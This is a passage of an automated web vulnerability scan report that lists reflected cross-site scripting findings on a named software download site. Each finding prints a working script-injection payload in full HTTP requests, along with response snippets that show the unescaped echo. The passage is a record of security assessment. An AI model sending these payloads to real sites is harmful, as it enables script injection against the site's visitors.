The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20d39"><script>alert(1)</script>36b459a9d64 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html20d39"><script>alert(1)</script>36b459a9d64 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html20d39"><script>alert(1)</script>36b459a9d64" />
...[SNIP]...

4.1658. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e19f5"><script>alert(1)</script>e0881237aee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html?e19f5"><script>alert(1)</script>e0881237aee=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html?e19f5"><script>alert(1)</script>e0881237aee=1" />
...[SNIP]...

4.1659. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40541"><script>alert(1)</script>0a50b7a4e8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories40541"><script>alert(1)</script>0a50b7a4e8b/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:33:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories40541"><script>alert(1)</script>0a50b7a4e8b/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html" />
...[SNIP]...

4.1660. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597b7"><script>alert(1)</script>5a1bd81061d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html597b7"><script>alert(1)</script>5a1bd81061d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:33 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html597b7"><script>alert(1)</script>5a1bd81061d" />
...[SNIP]...

4.1661. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6254b"><script>alert(1)</script>08a105a460f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html?6254b"><script>alert(1)</script>08a105a460f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html?6254b"><script>alert(1)</script>08a105a460f=1" />
...[SNIP]...

4.1662. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38933"><script>alert(1)</script>a091c5ce1f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories38933"><script>alert(1)</script>a091c5ce1f8/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories38933"><script>alert(1)</script>a091c5ce1f8/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html" />
...[SNIP]...

4.1663. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880f5"><script>alert(1)</script>ffef72251bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html880f5"><script>alert(1)</script>ffef72251bb HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html880f5"><script>alert(1)</script>ffef72251bb" />
...[SNIP]...

4.1664. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7afba"><script>alert(1)</script>952a07404a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html?7afba"><script>alert(1)</script>952a07404a0=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html?7afba"><script>alert(1)</script>952a07404a0=1" />
...[SNIP]...

4.1665. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab8db"><script>alert(1)</script>a8017a7f1a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesab8db"><script>alert(1)</script>a8017a7f1a7/free-64-bit-communications-telephony-downloads-3-46-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesab8db"><script>alert(1)</script>a8017a7f1a7/free-64-bit-communications-telephony-downloads-3-46-0-d.html" />
...[SNIP]...

4.1666. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e91c"><script>alert(1)</script>e48652f16c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html3e91c"><script>alert(1)</script>e48652f16c2 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html3e91c"><script>alert(1)</script>e48652f16c2" />
...[SNIP]...

4.1667. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5836"><script>alert(1)</script>5c1d810d2fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html?e5836"><script>alert(1)</script>5c1d810d2fe=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html?e5836"><script>alert(1)</script>5c1d810d2fe=1" />
...[SNIP]...

4.1668. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7253d"><script>alert(1)</script>294861f4a4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories7253d"><script>alert(1)</script>294861f4a4e/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories7253d"><script>alert(1)</script>294861f4a4e/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html" />
...[SNIP]...

4.1669. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2500"><script>alert(1)</script>7d8844f103c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.htmlb2500"><script>alert(1)</script>7d8844f103c HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.htmlb2500"><script>alert(1)</script>7d8844f103c" />
...[SNIP]...

4.1670. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d7af"><script>alert(1)</script>b1ff1afa51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html?3d7af"><script>alert(1)</script>b1ff1afa51b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html?3d7af"><script>alert(1)</script>b1ff1afa51b=1" />
...[SNIP]...

4.1671. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25cff"><script>alert(1)</script>55fd3605a8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories25cff"><script>alert(1)</script>55fd3605a8f/free-64-bit-desktop-downloads-4-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:32:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories25cff"><script>alert(1)</script>55fd3605a8f/free-64-bit-desktop-downloads-4-0-d.html" />
...[SNIP]...

4.1672. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7de5"><script>alert(1)</script>3c381f515e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-desktop-downloads-4-0-d.htmld7de5"><script>alert(1)</script>3c381f515e3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:58 GMT
Cache-Control: max-age=600
Pragma: cache
